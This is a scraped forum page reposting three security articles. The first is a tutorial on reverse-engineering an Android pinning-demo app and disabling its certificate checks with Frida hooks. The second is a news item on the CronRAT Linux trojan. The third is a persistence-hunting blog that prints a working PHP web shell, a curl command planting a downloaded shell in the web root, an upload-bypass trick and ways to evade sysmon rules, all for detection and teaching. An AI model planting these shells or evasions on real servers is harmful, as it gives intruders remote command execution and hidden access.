
Leaderboard

Popular Content

Showing content with the highest reputation on 12/15/21 in all areas

  1. Reverse engineering & modifying Android apps with JADX & Frida

I get a lot of emails from users who want to know exactly what their favourite Android app is doing, and want to tweak and change how that works for themselves. There are some great tools to do this, including JADX & Frida, but using these is complicated, and every reverse engineering problem has its own unique challenges & solutions. There are few good guides to getting started, and even fewer guides on the advanced tricks available. In this article, I want to talk you through the core initial steps to look inside any Android app, give you the tools to find & understand the specific code that matters to you, and then show you how you can use that information to modify the app for yourself. Let's set the scene first.

Context

I'm assuming here that somebody else has written an Android app that you're interested in. You want to know exactly how a specific bit of behaviour works, and you want to change what it's doing. I'm going to focus on the classic HTTP Toolkit user example here of certificate pinning: where security-conscious apps that send HTTPS traffic go beyond the normal HTTPS validation requirements, and actively check that the HTTPS certificates used are from a small set of specific trusted certificates, not just the standard set trusted by all Android devices. (I'm focusing on certificate pinning because it's a common use case and it's convenient, but the techniques here work for all other kinds of reverse engineering & patching too, don't worry!)

Certificate pinning is a problem for HTTP Toolkit users, who are trying to intercept HTTPS traffic to see what messages their Android apps are sending & receiving. It's not possible to intercept these apps' traffic because they won't trust HTTP Toolkit's certificate, even after it's been injected into the device's system certificate store. Using the tools we're going to talk about in a moment, we can take an unknown 3rd party app, find the certificate pinning code within it, and disable that remotely while the app runs on our device. This makes it possible to intercept, inspect & mock all of its traffic in any way we like!

This isn't easy, but it's usually not necessary. For starters, 99% of apps don't use certificate pinning beyond Android's standard restrictions, and for that case if you use HTTP Toolkit on a rooted device you're done in one click. For most apps that do explicitly pin their certificates, you can disable that using this general-purpose Frida script, which already knows how to disable all the most popular cert pinning libraries available. In some cases though, apps implement their own custom certificate pinning logic, or do something else unusual, which means the general-purpose script can't recognize and disable the right APIs. In these kinds of cases, or if you're trying to modify any other kind of app behaviour, you need to roll up your sleeves and get your hands dirty.

For this article, I've prepped a certificate pinning demo app: each button sends an HTTPS request, and validates the connection in a slightly different way. The 'unpinned' option does nothing, the next 4 use various standard pinning techniques, and the last button uses totally custom code to manually check the certificate. If you use this with HTTP Toolkit normally, you can only intercept the first request. If you use the general-purpose Frida script, you can intercept the next 4 too, but not the last one.
In this article we're going to focus on that last button, reverse engineer this app to see how it works, and write a custom Frida script to disable the certificate checking functionality.

The Plan

To reverse engineer an app and hook some behaviour, there are a few core steps you need to work through: download a copy of the app to your computer, extract the source code, find the code we're interested in, understand how that code works, and write a Frida hook to change how that code works.

Download the app

Android apps are generally published to the Google Play store, but you can't easily download the app from there directly to mess around with on your computer. Fortunately, there are many sites that mirror the Google Play store and do provide direct downloads of almost all available apps. ApkMirror.com and ApkPure.com are two good examples. In the general case, you should go to your favourite APK mirror site and download the latest APK for the app you're interested in. In this specific case, I wrote the app, so I've conveniently published it directly on GitHub. You can download its APK here.

Android app formats

What is this APK file? Let's start with some quick but necessary background on Android app formats. There are two distribution formats you'll run into: APKs (older) and XAPKs (newer, also known as Android App Bundles). In this example, the app is provided as a single APK, so that's easy enough, but many other apps you'll run into may be XAPKs, so it's worth understanding the difference. APKs are fairly simple: they're a ZIP file with a bunch of metadata, all the application's assets & config files, and one or more binary .dex files, which contain the compiled application. XAPKs are more complicated: they're a zip file that contains multiple APKs. In practice, they'll contain one large primary APK with the main application code & resources, and then various small APKs which include the config or resources only relevant to certain types of devices. There might be separate config APKs for devices with larger screens, or different CPU architectures. For reverse engineering you usually just need the main APK, and you can ignore the rest.

Extract the code

Inside the APK, if you open it as a zip, you'll find a large classes.dex file (for multidex apps, there might even be a classes2.dex or more). These DEX files contain all the JVM classes of the application, in the compiled bytecode format used by Android's runtime engine (ART, which replaced Dalvik a few years back). These DEX files contain the compiled application, but do not contain all the original source. Many things, most notably local variable names & comments, are lost when compiling an Android application, and it's impossible to extract those from the app. The external interfaces of each class are generally present here though (assuming that obfuscation wasn't used). That will usually be enough to find the method that you're interested in. Using those external interfaces you can usually then deduce what each line is trying to do, and progressively rename variables and add your own comments until you have some code that makes sense. To start that process, we need to convert the DEX file into a format we can mess around with ourselves. The best tool to do this is JADX (you can download it from their GitHub release page). Once JADX is installed, you run it like so:

jadx ./pinning-demo.apk

This will create a folder with the same name as the APK, containing 'resources' and 'sources' folders.
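As a quick sanity check (the folder name below just assumes the jadx invocation above), the resulting layout looks like this:

$ ls pinning-demo/
resources  sources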
The sources folder is what we're interested in: this is JADX's best guess at the Java source code that would've generated this DEX file. It's not perfect, but it should be pretty close. If you use JADX on the latest pinning demo APK, you'll find a structure like this:

sources/
  android/ - the core Android classes
  androidx/ - Android Jetpack classes
  com/
    android/volley/ - The Volley HTTP client
    datatheorem/android/trustkit - One of the popular pinning libraries used
    google/ - Firebase, GSON & various other Google packages
  kotlin/ - runtime components of Kotlin
  okhttp3/ - OkHttp3, a popular HTTP library
  [...various other namespaces & packages]
  tech/httptoolkit/pinning_demo/ - the main application code

Once you've extracted the code from an app like this, you can explore it any way you like - using Android Studio, using any other text editor, or just grepping for interesting text; it's up to you. By default, I'd recommend using an editor that can highlight and do basic automated refactoring (variable renaming) on Java code, since that'll make the next steps much easier.

Find the code you care about

Which code you want to reverse engineer & hook depends on the problem you're trying to solve. In my case, the problem is that when I intercept the app's HTTP traffic using HTTP Toolkit and press the "Manually pinned request" button, I get a "Certificate rejected" message in HTTP Toolkit, and I want to stop that happening. That message typically means that the app is pinning a certificate - i.e. even though the HTTP Toolkit certificate is trusted on the device, the app is including its own custom checks, which are rejecting the HTTPS certificates and blocking HTTP Toolkit's automatic HTTP interception. So, the goal here is to find out which bit of code is making the custom-checked HTTPS request behind that last button, find out where that checks the certificate, and then later disable that check. Whatever code you want to change in your case, there are a lot of tricks available to help you hunt it down. Let's try out a few different approaches on this demo app.

Search for relevant strings

In my case, I know the failing request is going to sha512.badssl.com (a known-good HTTPS test site), so searching for that is a good start. That works, and gives me a few different places in the code that are sending requests, but there are options here for all the different possible pinning mechanisms, and related config files too. It's not immediately clear which code is relevant, so it'd be better to find something more precise. Some other strings that might be interesting for the certificate pinning case: checkCert, validateCert, pinning, pinner, certificate, SSL, TLS. Here you're looking for anything that might be included in the name of a class, field or method, or which might be included in strings (e.g. error messages), since all of that will be preserved and searchable in the decompiled code. For example, if you're trying to understand where some HTTP API data comes from, you could try searching for the API endpoint path, or the name of query parameters. If you're looking for the implementation of a specific algorithm, it's worth searching for the common domain terms in that algorithm, or if you're trying to extract secrets or keys from the app then 'secret', 'key', and 'auth' are all worth investigating.
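To make that concrete, here are a couple of throwaway searches over the decompiled output (a rough sketch using standard tools; the paths simply match the demo app's output folder from earlier, and the keywords are just the examples above):

grep -rn "sha512.badssl.com" pinning-demo/sources/
grep -rli -E "pinning|checkCert|certificate" pinning-demo/sources/

The first finds everywhere the known hostname appears; the second lists every file mentioning any of the pinning-related terms.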
Search for usage of relevant Java APIs

Although local variable names aren't available, and in obfuscated apps even the class & package names may be obscured, the built-in JVM classes & package names are always available and unchanged. That means they're a great way to find related functionality. If you know the code you're interested in is likely to be using a certain data type, calling a specific API, or throwing a certain type of exception, you can use that to immediately narrow down your search. In this example, I think it's likely that all manual certificate checks are going to be using java.security.cert.X509Certificate, so I can search for usages of that type. This does give some good answers! Unfortunately though, the entire app is filled with lots of different ways to do certificate pinning, by design, so this still comes back with a long list of matches, and it's not easy to tell immediately which is relevant. In most other apps that won't be a problem (most apps implement certificate pinning just the once!) and we could trawl through the results, but for now it's better to test out some other options first.

Check for HTTP error reports

Many apps nowadays include automatic error reporting using tools like Sentry. This is useful to app developers, but also to reverse engineers! Even when the app's own requests may use certificate pinning, requests sent by external libraries like these generally will not, so they're inspectable using HTTP Toolkit (or any other HTTP MitM proxy). That's useful because those requests themselves will usually include the stacktrace for any given error. This provides an excellent way of finding the source of any errors that you want to work around: intercept traffic from your device using HTTP Toolkit or another proxy, trigger the error, look through the captured HTTP traffic for error reports, find the stacktrace in the relevant error report, and follow the stacktrace into the codebase extracted earlier to immediately find the relevant code. Bingo! In this case though, we're out of luck, as it's a tiny demo app with no error reporting. More searching required.

Check ADB for errors

Very commonly, apps will log errors and extra info to the console for easy debugging. Android captures this output from all running JVM processes in a single output buffer, along with stack traces from all uncaught errors, and makes that accessible via ADB using the logcat command. Outputting errors and debug info here is especially common in smaller apps which don't use an automated error reporting tool, so if you're looking to find & change some code that throws errors it's a great alternative to the previous approach. Even in non-error cases, the output here can provide excellent clues about application behaviour at the moments you're interested in. To capture the logs from a device, run:

adb logcat -T1

This will stream the live logs from your device, without the history, until you stop it. It's often useful to pipe this to a file instead (i.e. ... > logs.txt) to save it for more detailed analysis later, since there can be a lot of noise here from other activity on the device. While this command is running, if you reproduce your error, you'll frequently find useful error stacktraces or error messages, which can then guide you to the right place in the code. For our demo app, this works great.
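Since other apps and system services keep logging at the same time, it can be handy to save and filter in one go (a hedged one-liner of my own, not from the original article - adjust the keywords to your case):

adb logcat -T1 | tee logs.txt | grep -iE "error|exception|cert"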
With logging running while pressing the button, if we look carefully among the other noisy log output, we can pull out the specific error message unique to that button:

> adb logcat -T1
--------- beginning of main
...
11-22 10:46:16.478 31963 31963 I Choreographer: Skipped 114 frames! The application may be doing too much work on its main thread.
11-22 10:46:16.996  1785  1785 D BluetoothGatt: close()
11-22 10:46:16.997  1785  1785 D BluetoothGatt: unregisterApp() - mClientIf=5
11-22 10:46:17.000   791  1280 I bt_stack: [INFO:gatt_api.cc(1163)] GATT_CancelConnect: gatt_if:5, address: 00:00:00:00:00:00, direct:0
11-22 10:46:17.092   573   618 D LightsService: Excessive delay setting light
11-22 10:46:17.258   282   286 E TemperatureHumiditySensor: mCompEngine is NULL
11-22 10:46:18.773 26029 26129 I System.out: java.lang.Error: Unrecognized cert hash.
11-22 10:46:19.034 26029 26080 W Adreno-EGL: <qeglDrvAPI_eglGetConfigAttrib:607>: EGL_BAD_ATTRIBUTE
...

We can search the codebase for this Unrecognized cert hash error message, and conveniently that message is shown in exactly one place. This error appears deep inside invokeSuspend in MainActivity$sendManuallyCustomPinned$1.java:

throw new Error("Unrecognized cert hash.");

Explore the code in depth

Still stuck? At this point, your best bet is to try and explore the application more generally, or to explore around the best clues you've found so far. To do so, you can use the manifest (in resources/AndroidManifest.xml) to find the entrypoints for every activity and background service registered in the application. Start with the services (i.e. background processes) or activities (i.e. a visible page of the UI) that sound most relevant to your situation, open up the corresponding source, and start digging. This can be time consuming. Keep going! You don't need to dig into every detail, but walking through here can quickly give you an idea of the overall architecture of the app, and you can often use this to find the code that's relevant to you. It's well worth keeping notes & adding inline comments as you go to keep track of the process.

Understand the code

Hopefully by this point you've found the code that's relevant to you.
In this demo app, that code decompiled by JADX looks like this:

public final Object invokeSuspend(Object obj) {
    IntrinsicsKt.getCOROUTINE_SUSPENDED();
    if (this.label == 0) {
        ResultKt.throwOnFailure(obj);
        this.this$0.onStart(R.id.manually_pinned);
        boolean z = true;
        try {
            TrustManager[] trustManagerArr = {new MainActivity$sendManuallyCustomPinned$1$trustManager$1()};
            SSLContext instance = SSLContext.getInstance("TLS");
            instance.init(null, trustManagerArr, null);
            Intrinsics.checkExpressionValueIsNotNull(instance, "context");
            Socket createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443);
            if (createSocket != null) {
                SSLSocket sSLSocket = (SSLSocket) createSocket;
                SSLSession session = sSLSocket.getSession();
                Intrinsics.checkExpressionValueIsNotNull(session, "socket.session");
                Certificate[] peerCertificates = session.getPeerCertificates();
                Intrinsics.checkExpressionValueIsNotNull(peerCertificates, "certs");
                int length = peerCertificates.length;
                int i = 0;
                while (true) {
                    if (i >= length) {
                        z = false;
                        break;
                    }
                    Certificate certificate = peerCertificates[i];
                    MainActivity mainActivity = this.this$0;
                    Intrinsics.checkExpressionValueIsNotNull(certificate, "cert");
                    if (Boxing.boxBoolean(mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)).booleanValue()) {
                        break;
                    }
                    i++;
                }
                if (z) {
                    PrintWriter printWriter = new PrintWriter(sSLSocket.getOutputStream());
                    printWriter.println("GET / HTTP/1.1");
                    printWriter.println("Host: untrusted-root.badssl.com");
                    printWriter.println("");
                    printWriter.flush();
                    System.out.println((Object) ("Response was: " + new BufferedReader(new InputStreamReader(sSLSocket.getInputStream())).readLine()));
                    sSLSocket.close();
                    this.this$0.onSuccess(R.id.manually_pinned);
                    return Unit.INSTANCE;
                }
                sSLSocket.close();
                throw new Error("Unrecognized cert hash.");
            }
            throw new TypeCastException("null cannot be cast to non-null type javax.net.ssl.SSLSocket");
        } catch (Throwable th) {
            System.out.println(th);
            this.this$0.onError(R.id.manually_pinned, th.toString());
        }
    } else {
        throw new IllegalStateException("call to 'resume' before 'invoke' with coroutine");
    }
}

There's a lot going on here! The original code (here) is written in Kotlin and uses coroutines, which adds a lot of extra noise in the compiled output. Fortunately, we don't need to understand everything. To change this behaviour, we just need to work out what code paths could lead to the highlighted line above, where the error is thrown. As you can see here, JADX has taken some best guesses at the variable names involved in this code, inferring them from the types created (e.g. printWriter = new PrintWriter) and from the methods called (peerCertificates = session.getPeerCertificates()). This is pretty clever, and helps a lot to see what's happening. It's not perfect though. You can see this in some inferred variables like createSocket = instance.getSocketFactory().createSocket("untrusted-root.badssl.com", 443), where the variable has just taken the name of the method, or the z boolean variable, where no clues were available to infer anything useful at all. If you have experience with code like this it may be easy to see what's happening here, but let's walk through it step by step: the line we're interested in only runs if z is false, since the preceding if (z) block ends with return.
We can rename z to isCertValid (made easier by automated refactoring) and remove some Kotlin boilerplate to make the code immediately clearer, giving us code like:

boolean isCertValid = true;
//...
int length = peerCertificates.length;
int i = 0;
while (true) {
    if (i >= length) {
        isCertValid = false;
        break;
    }
    Certificate certificate = peerCertificates[i];
    MainActivity mainActivity = this.this$0;
    if (mainActivity.doesCertMatchPin(MainActivityKt.BADSSL_UNTRUSTED_ROOT_SHA256, certificate)) {
        break;
    }
    i++;
}
if (isCertValid) {
    // ...
    return Unit.INSTANCE;
}
sSLSocket.close();
throw new Error("Unrecognized cert hash.");

The block before the if is while (true), so this code only runs after that breaks. The break commands happen either after checking all values (setting isCertValid to false) or after doesCertMatchPin returns true for one value. That means the exception is only thrown when doesCertMatchPin returns false for all values, and that method is indeed what causes our problem. This gives us a good understanding of the logic here: the code checks every certificate linked to a socket, and calls doesCertMatchPin from the MainActivity class to compare it to BADSSL_UNTRUSTED_ROOT_SHA256.

This is an intentionally simple example. Real examples will be more complicated! But hopefully this gives you an idea of the process, and the same techniques of incremental renaming, refactoring and exploring can help you understand more complex cases. It's worth noting that the relatively clear code here isn't always available, usually because obfuscation techniques are used to rename classes, fields & methods throughout the code to random names (a, b..., aa, ab...). In that case, the same process we're discussing here applies, but you won't have many of the names available as clues to start with, so you can only see the overall structure and references to built-in JVM APIs. It is still always possible to reverse engineer such apps, but it's much more important to quickly find the precise code that you're interested in before you start, and the process of understanding it is significantly more difficult. That's a topic for another blog post though (watch this space).

Patch it with Frida

Once we've found the code, we need to think about how to change it. For our example here, it's easy: we need to make doesCertMatchPin return true every time. Be aware that Frida gives you a lot of power to patch code, but the flexibility is not unlimited. Frida patches are very focused on method implementation replacement, and it's very difficult (if not impossible) to use Frida to patch individual lines within existing methods. You need to look out for method boundaries at which you can change behaviour. For certificate pinning, that's fairly easy, because certificate checks are almost always going to live in a separate method like checkCertificate(cert), so you can focus on that. In other cases though this can get more complicated. In this specific case, we're looking to patch the doesCertMatchPin function in the tech.httptoolkit.pinning_demo.MainActivity class. Within a Frida script, we first need to get a reference to that method:

const certMethod = Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin;

Then we need to assign an alternative implementation to that method, like so:

certMethod.implementation = () => true;

After this patch is applied, the real implementation of that doesCertMatchPin method will never be called, and it'll just return true instead. This is a simple example.
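As a small variation (my own sketch, not from the original article), you can also keep an eye on what the real check would have decided by calling it and logging before forcing the result. Note this uses a regular function rather than an arrow function, so that this refers to the hooked instance; the pin and cert parameter names are just placeholders for the method's two arguments:

Java.perform(() => {
    const MainActivity = Java.use("tech.httptoolkit.pinning_demo.MainActivity");
    MainActivity.doesCertMatchPin.implementation = function (pin, cert) {
        // Calling the method on 'this' from inside a hook invokes the original implementation:
        const realResult = this.doesCertMatchPin(pin, cert);
        console.log("doesCertMatchPin would have returned " + realResult + ", forcing true");
        return true;
    };
});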
There's many more complex things you can do though. Here's some examples:

// Disable a property setter, to stop some fields being changed:
const classWithSetter = Java.use("a.target.class");
classWithSetter.setATargetProperty.implementation = () => {
    return; // Don't actually set the property
};

// Wrap a method, to add extra functionality or logging before and after without
// changing the existing functionality:
const classToWrap = Java.use("a.target.class");
const originalMethod = classToWrap.methodToWrap;
classToWrap.methodToWrap.implementation = () => {
    console.log('About to run method');
    const result = originalMethod.apply(this, arguments);
    console.log('Method returned', result);
    return result;
};

// Hook the constructor of an object:
const classToHook = Java.use("a.target.class");
const realConstructor = classToHook.$init;
classToHook.$init.implementation = () => {
    // Run the real constructor:
    realConstructor.apply(this, arguments);
    // And then modify the initial state of the class however you like before
    // anything else gets access to it:
    this.myField = null;
};

There's a huge world of options here - those are just some of the basic techniques at your disposal. Once you've found a method you want to patch and you've got an idea how you'll do it, you need to set up Frida (see this guide if you haven't done so already) to test it out. Once Frida is working you can test out your patch interactively, and tweak it live to get it working. For example, to test out our demo hook above:

Attach HTTP Toolkit to the device.
Run the app, and check that the "Manually pinned request" button fails and shows a certificate error in HTTP Toolkit.
Start Frida server on the device.
Restart your application with Frida attached by running: frida --no-pause -U -f tech.httptoolkit.pinning_demo
This will start the app, and give you a REPL to run Frida commands.
Run Java.perform(() => console.log('Attached')) to attach this process to the VM & class loader (it'll pause briefly, then log 'Attached').
Test out some hooks. For our demo app, for example, you can hook the certificate pinning function by running: Java.use("tech.httptoolkit.pinning_demo.MainActivity").doesCertMatchPin.implementation = () => true;
Clear the logs in HTTP Toolkit, and then press the "Manually pinned request" button again.
It works! The button should go green, and the full request should appear successfully in HTTP Toolkit.

Once you've got something that works in a REPL, you can convert it into a standalone script, like so:

Java.perform(() => {
    console.log("Patching...");
    const mainActivityClass = Java.use("tech.httptoolkit.pinning_demo.MainActivity");
    const certMethod = mainActivityClass.doesCertMatchPin;
    certMethod.implementation = () => true;
    console.log("Patched");
});

and then you can run this non-interactively with Frida using the -l option, for example:

frida --no-pause -U -f tech.httptoolkit.pinning_demo -l ./frida-script.js

That command will restart the app with the script injected immediately, so that the certificate pinning behind this button is disabled straight away, and tapping the button will always show a successful result. If you want examples of more advanced Frida behaviour, take a look through my cert unpinning script for certificate pinning examples for every popular library and some other interesting cases, or check out this huge selection of Frida snippets demonstrating all sorts of other tricks and APIs available. I hope this helps you to reverse engineer, understand & hook Android applications!
Have questions or run into trouble? Get in touch on Twitter, file issues against my Frida script, or send me a message directly. Published 4 days ago by Tim Perry. Source: https://httptoolkit.tech/blog/android-reverse-engineering/
    1 point
  2. Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day. Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet. CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk. "The CronRAT adds a number of tasks to crontab with a curious date specification: 52 23 31 2 3," the researchers explained. "These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st." The RAT — a "sophisticated Bash program" — also uses many levels of obfuscation to make analysis difficult, such as placing code behind encoding and compression barriers, and implementing a custom binary protocol with random checksums to slip past firewalls and packet inspectors, before establishing communications with a remote control server to await further instructions. Armed with this backdoor access, the attackers associated with CronRAT can run any code on the compromised system, the researchers noted. "Digital skimming is moving from the browser to the server and this is yet another example," Sansec's Director of Threat Research, Willem de Groot, said. "Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface." CronRAT: A New Linux Malware That's Scheduled to Run on February 31st (thehackernews.com)
    1 point
  3. Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery, and Webshells
Nov 22, 2021 • Pepe Berba

This blog series explores methods attackers might use to maintain persistent access to a compromised Linux system. To do this, we will take an "offense informs defense" approach by going through techniques listed in the MITRE ATT&CK Matrix for Linux. I will try to: give examples of how an attacker might deploy one of these backdoors, and show how a defender might monitor and detect these installations. By giving concrete implementations of these persistence techniques, I hope to give defenders a better appreciation of what exactly they are trying to detect, and some clear examples of how they can test their own alerting.

Overview of blog series

The rest of the blog post is structured with the following: an introduction to persistence, Linux auditing and file integrity monitoring, and how to set up and detect web shells. Each persistence technique has two main parts: how to deploy the persistence technique, and how to monitor and detect it. In this blog post we will only discuss web shells as a case study for logging and monitoring. We will discuss other techniques in succeeding posts. Throughout this series we will go through the following:

Hunting for Persistence in Linux (Part 1): Auditing, Logging and Webshells
- Server Software Component: Web Shell
Hunting for Persistence in Linux (Part 2): Account Creation and Manipulation
- Create Account: Local Account
- Valid Accounts: Local Accounts
- Account Manipulation: SSH Authorized Keys
Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron
- Create or Modify System Process: Systemd Service
- Scheduled Task/Job: Systemd Timers
- Scheduled Task/Job: Cron
Hunting for Persistence in Linux (Part 4): Initialization Scripts, Shell Configuration, and others
- Boot or Logon Initialization Scripts: RC Scripts
- Event Triggered Execution: Unix Shell Configuration Modification

Introduction to persistence

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access [1]. Attackers employ persistence techniques so that exploitation phases do not need to be repeated. Remember, exploitation is just the first step for the attacker; they still need to take additional steps to fulfill their primary objective. After successfully gaining access to the machine, they need to pivot through the network and find a way to access and exfiltrate the crown jewels. During these post-exploitation activities, the attacker's connection to the machine can be severed, and to regain access, the attacker might need to repeat the exploitation step. Redoing the exploitation might be difficult depending on the attack vector: sending an email with a malicious attachment (the victim wouldn't open the same maldoc twice; you'd have to send another email and hope the victim falls for it again), using leaked credentials and keys (the passwords might be reset or the keys revoked), or exploiting servers with critical CVEs (the server can be patched). Because of how difficult the exploitation can be, an attacker would want to make the most out of their initial access. To do this, they install backdoor access that reliably maintains access to the compromised machine even after reboots. With persistence installed, the attacker no longer needs to rely on exploitation to regain access to the system.
They might simply use the account they added to the machine, or wait for a reverse shell from an installed service.

0 Linux Logging and Auditing

0.1 File Integrity Monitoring

The configuration changes needed to set up persistence usually require the attacker to touch the machine's disk, such as creating or modifying a file. This gives us an opportunity to catch the adversaries if we are able to look out for file creation or modification related to special files or directories. For example, we can look for the creation of the web shell itself. This can be done by looking for changes within the web directory like /var/www/html. You can use the following:
- Wazuh's File Integrity Monitoring: https://documentation.wazuh.com/current/learning-wazuh/detect-fs-changes.html
- Auditbeat's File Integrity Monitoring: https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html
- auditd
For the blog posts, we will be using mainly auditd and auditbeat jointly. For instructions on how to set up auditd and auditbeat, see A02 in the appendix.

0.2 Auditd and Sysmon

0.2.1 What is sysmon and auditd?

Two powerful tools to monitor the different processes in the OS are:
- auditd: the de facto auditing and logging tool for Linux
- sysmon: previously a tool exclusively for Windows; a Linux port has recently been released
Each of these tools requires you to configure rules for it to generate meaningful logs and alerts. We will use the following for auditd and sysmon respectively:
- https://github.com/Neo23x0/auditd
- https://github.com/microsoft/MSTIC-Sysmon/tree/main/linux
For instructions on how to install sysmon, refer to appendix A01.

0.2.2 Comparison of sysmon and auditd

At the time of writing this blog post, sysmon for Linux has only been released for about a month. I have no experience deploying sysmon at scale. Support for sysmon for Linux is still in development for agents such as Linux Elastic Agent (see issue here). I'm using sysmonforlinux/buster,now 1.0.0 amd64 [installed]. While doing the research for this blog post, my observations so far are:
- sysmon's rule definitions are much more flexible and expressive than auditd's
- rules depending on user input fields such as CommandLine can be bypassed just like other string-matching rules
- In my testing, sysmon only has the event FileCreate, which is triggered only when creating or overwriting files. This means that file modification (such as appending to files) is not caught by sysmon, so file integrity monitoring is a weakness for sysmon.
- I've experienced some problems with the rule title displayed in the logs.
- Auditd rules can filter down to the syscall level, while sysmon filters based on high-level predefined events such as ProcessCreation and FileCreate. This means that if a particular activity you are looking for is not mapped to a sysmon event, then you might have a hard time using sysmon to watch for it.
Overall, I'm very optimistic about adopting sysmon for Linux in the future to look for interesting processes and connections, but I would still rely on other tools for file integrity monitoring such as auditd or auditbeat. In Windows, having only FileCreate is okay since you have other events specific to configuration changes in registry keys (RegistryEvent), but in Linux, since all of the configuration is essentially files, file integrity monitoring plays a much bigger role in hunting for changes in system configuration.
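As a concrete illustration of that last point (an illustrative rule of my own choosing, not taken from the Neo23x0 or MSTIC rule sets), a single auditd watch rule is enough to flag writes and attribute changes to a sensitive config file and tag the events with a searchable key:

-w /etc/passwd -p wa -k passwd_changes

Here -w names the file to watch, -p wa restricts the watch to write and attribute-change access, and -k attaches the key you later filter on in your SIEM.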
The good thing with sysmon is that rules for network activities and process creation are much more expressive compared to trying to use a0, a1 for command line arguments in auditd. We will discuss some of the findings in the next blog posts, but some examples of bypasses are:
- T1087.001_LocalAccount_Commands.xml looks for commands that have /etc/passwd to detect account enumeration. We can use cat /etc//passwd to bypass this rule.
- T1070.006_Timestomp_Touch.xml looks for -r or --reference in touch commands to look for timestamp modification. We can use touch a -\r b to bypass this, or even touch a -\-re\ference=b.
- T1053.003_Cron_Activity.xml aims to monitor changes to crontab files. Using echo "* * * * * root touch /root/test" >> /etc/crontab will bypass this because it does not create or overwrite a file, and in Debian 10 using the standard crontab -e will not trigger this because the TargetFilename is +/var/spool/cron/crontabs and the extra + at the start causes the rule to fail.
You can see the different architectures for auditd and sysmon here:
- Redhat, CHAPTER 7. SYSTEM AUDITING
- Lead Microsoft Engineer Kevin Sheldrake Brings Sysmon to Linux
We see from the diagram from linuxsecurity.com that sysmon works on top of eBPF, which is an interface to the syscalls of the Linux kernel. This serves as an abstraction when we define sysmon rules, but as a consequence, this flexibility gives attackers room to bypass some of the rules. For example, in sysmon, we can look for a FileCreate event with a specific TargetFilename. This is more flexible because you can define rules based on patterns or keywords and look for files that do not exist yet. However, string matches such as /etc/passwd can fail if the target name is not exactly that string. In auditd, by contrast, what is being watched are actions on the inodes of the files and directories defined. This means there is no ambiguity about which specific files are watched. You can even look for read access to specific files. However, because it watches based on inodes, the files have to exist when the auditd service is started. This means you cannot watch files based on certain patterns like <home>/.ssh/authorized_keys.

0.3 osquery

Osquery allows us to investigate our endpoints using SQL queries. This simplifies the task of investigating and collecting evidence. Moreover, when paired with a management interface like fleetdm, it allows you to take baselines of your environments and even hunt for adversaries. An example from a future blog post is looking for accounts that have a password set. If you expect your engineers to always SSH via public key, then you should not see active passwords. We can get this information using this query:

SELECT password_status, username, last_change
FROM shadow
WHERE password_status = 'active';

And get results for all your fleet, something similar to this:

+-----------------+----------+-------------+
| password_status | username | last_change |
+-----------------+----------+-------------+
| active          | www-data | 18953       |
+-----------------+----------+-------------+

Now why does www-data have a password? Hmm… Installation instructions can be found in the official docs. Once installed, simply run osqueryi and run the SQL queries.

1 Server Software Component: Web Shell

1.1 Introduction to web shells

MITRE: https://attack.mitre.org/techniques/T1505/003/

A web shell is a backdoor installed in a web server by an attacker.
Once installed, it becomes the initial foothold of the attacker, and if it's never detected, it becomes an easy persistent backdoor. In our example, to install a web shell we add a bad .php file inside /var/www/html. Some reasons this can happen are:
- the web application has a vulnerable upload API
- the web application has a critical RCE vulnerability
- the attacker has existing access that can modify the contents of the web root folder
If the attacker can upload malicious files that run as php, then he can get remote access to the machine. One famous example of this is the 2017 Equifax Data Breach. You can read the report, but here's my TLDR: the web server was running Apache Struts containing a critical RCE vulnerability. Attackers used this RCE to drop web shells, which they used to gain access to sensitive data and exfiltrate it. Around 30 different web shells were used in the breach. See the following resources:
- https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
- https://portswigger.net/web-security/os-command-injection

1.2 Installing your own web shells

Note: If you want to try this out you can follow the setup instructions in appendix A00. Assuming we already have RCE, we add a file phpinfo.php that will contain our web shell:

vi /var/www/html/phpinfo.php

Choose any of the example php web shells. For example:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>

Now anyone with access to http://x.x.x.x/phpinfo.php would be able to access the web shell and run arbitrary commands. What if you don't have shell access? You might be able to install a web shell through an unrestricted upload. Upload your php backdoor as image.png.php and the backdoor might be accessible on http://x.x.x.x/uploads/image.png.php. Another possible command that you can use is:

curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php

1.3 Detection: Creation or modification of php files

Using auditbeat's file integrity monitoring

For some web applications, we might be able to monitor the directories of our web app in auditbeat's file integrity monitoring:

- module: file_integrity
  paths:
  - /bin
  - /usr/bin
  - /sbin
  - /usr/sbin
  - /etc
  - /var/www/html   # <--- Add
- module: system
  datasets:
    - package # Installed, updated, and removed packages

When using auditbeat's file integrity monitoring module and looking at event.module: file_integrity, we see that our vi command "moved" the file. In this case, moved is the same as updated because of how vi works.
vi creates a temporary file /var/www/html/phpinfo.php.swp, and if you save the file it replaces /var/www/html/phpinfo.php. An example of a command that would result in a created log would be if we ran:

curl https://raw.githubusercontent.com/JohnTroony/php-webshells/master/Collection/PHP_Shell.php -o /var/www/html/backdoor_shell.php

Using auditd to monitor changes

We can add the following rule to auditd:

